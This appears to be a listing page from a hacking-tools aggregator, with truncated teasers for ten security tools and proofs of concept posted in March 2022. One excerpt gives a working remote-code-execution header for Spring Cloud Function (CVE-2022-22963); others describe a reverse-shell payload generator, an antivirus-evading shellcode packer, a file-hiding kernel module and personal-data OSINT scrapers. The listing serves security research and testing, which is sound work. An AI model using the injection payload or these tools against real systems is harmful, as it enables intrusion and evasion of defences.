Hacking tools :: CodePwn

March 31, 2022CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit ...

by KitPloit in Vulnerable, Container, Burp, CVE-2022-22963, Exposing

March 31, 2022Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP

spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") build wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zipunzip v3.1.6.zipcd spring-cloud-function-3.1.6cd spring-cloud-function-samples/function-sample-pojomvn packagejava -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar get path...

by KitPloit in 0day, Spel, Spring Cloud Function, Spring-Spel-0Day-Poc

March 30, 2022Casper-Fs - A Custom Hidden Linux Kernel Module Generator. Each Module Works In The File System To Protect And Hide Secret Files

Casper-fs is a custom Linux Kernel Module generator to work with resources to protect or hide a custom list of files. Each LKM has resources to protect...

by KitPloit in Casper-Fs, Filesystem, Kernel Driver, Secret Files

March 30, 2022CVE-2022-27254 - PoC For Vulnerability In Honda's Remote Keyless System

PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254) Disclaimer: For educational purposes only. Kindly note that the discoverers for this vulnerability are Ayyappan Rajesh, a...

by KitPloit in Vulnerability, CVE-2022-27254

March 29, 2022Socid-Extractor - Extract Accounts Info From Personal Pages On Various Sites For OSINT Purpose

Extract information about a user from profile webpages / API responses and save it in machine-readable format. Usage As a command-line tool: $ socid_extractor --url...

by KitPloit in Socmint, Socid Extractor, Socid Extractor

March 29, 2022LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly

A low-dependency command-line tool for generating reverse shell payloads on the fly. Description LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby...

by KitPloit in Red Teaming, Pentest Tool, LAZYPARIAH, Payload Generation, Payload Generatorrrr

March 28, 2022Gitcolombo - Extract And Analyze Contributors Info From Git Repos

OSINT tool to extract info about persons from git repositories: common names, emails, matches between different (as it may seems) accounts. Using ...

by KitPloit in Authors, Bitbucket, Committer, Emails, Gitcolombo

March 28, 2022Fennec - Artifact Collection Tool For *Nix Systems

fennec is an artifact collection tool written in Rust to be used during incident response on *nix based systems. fennec allows you to write a configuration...

by KitPloit in Dfir, ThreatHunting, Blueteam, Fennec, Irjahdvrur

March 27, 2022Nimcrypt2 - .NET, PE, And Raw Shellcode Packer/Loader Written In Nim

Nimcrypt2 is yet another PE packer/loader designed to bypass AV/EDR. It is an improvement on my original Nimcrypt project, with the main improvements being the use of direct syscalls and...

by KitPloit in mimikatz, Spoofing, Syscalls, Shellcode, Nimcrypt2, VAST

March 27, 2022Ostorlab - A Security Scanning Platform That Enables Running Complex Security Scanning Tasks Involving Multiple Tools In An Easy, Scalable And Distributed Way

The Sales Pitch If this is the first time you are visiting the Ostorlab Github page, here is the sales pitch. Security testing requires often chaining...

by KitPloit in Security Tools, Scanner, Ostorlab, swarm